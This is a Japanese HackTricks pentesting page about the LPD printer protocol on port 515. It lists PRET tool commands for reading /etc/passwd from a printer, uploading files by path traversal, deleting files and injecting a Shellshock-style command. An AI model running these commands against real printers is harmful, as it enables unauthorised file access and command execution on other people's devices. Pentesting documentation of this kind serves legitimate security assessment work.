hacktricks/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md

ゼロからヒーローまでAWSハッキングを学ぶ htARTE（HackTricks AWS Red Team Expert）！

HackTricksをサポートする他の方法：

• HackTricksで企業を宣伝したいまたはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください！
• 公式PEASS＆HackTricksスワッグを入手する
• The PEASS Familyを発見し、独占的なNFTsのコレクションを見つける
• 💬 Discordグループまたはtelegramグループに参加するか、Twitter 🐦 @carlospolopmをフォローする
• ハッキングトリックを共有するには、HackTricksとHackTricks CloudのgithubリポジトリにPRを提出してください。

LPDプロトコルの紹介

1980年代に、Line Printer Daemon（LPD）プロトコルはBerkeley Unixで開発され、後にRFC1179を通じて正式化されました。このプロトコルは、lprコマンドを介して操作を許可する、ポート515/tcp上で動作します。LPDを介した印刷の本質は、制御ファイル（ジョブの詳細とユーザーを指定する）とデータファイル（印刷情報を保持する）を送信することです。制御ファイルにより、データファイルのさまざまなファイル形式を選択できますが、これらのファイルの処理は特定のLPD実装によって決定されます。Unixライクなシステム向けの広く認識された実装はLPRngです。LPDプロトコルは、悪意のあるPostScriptまたはPJL印刷ジョブを実行するために悪用される可能性があります。

LPDプリンターとのやり取りに使用するツール

PRETは、lpdprintとlpdtestという2つの重要なツールを紹介し、LPD互換のプリンターとやり取りする簡単な方法を提供します。これらのツールを使用すると、データの印刷から、プリンター上のファイルの操作（ダウンロード、アップロード、削除など）まで、さまざまなアクションを実行できます。

# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local

Shodan

• ポート515

ゼロからヒーローまでのAWSハッキングを学ぶ htARTE（HackTricks AWS Red Team Expert）！

HackTricksをサポートする他の方法：

• HackTricksで企業を宣伝したいまたはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください！
• 公式PEASS＆HackTricksスワッグを入手する
• The PEASS Familyを発見し、独占的なNFTsのコレクションを見つける
• 💬 Discordグループまたはtelegramグループに参加するか、Twitter 🐦 @carlospolopmでフォローしてください。
• HackTricksおよびHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。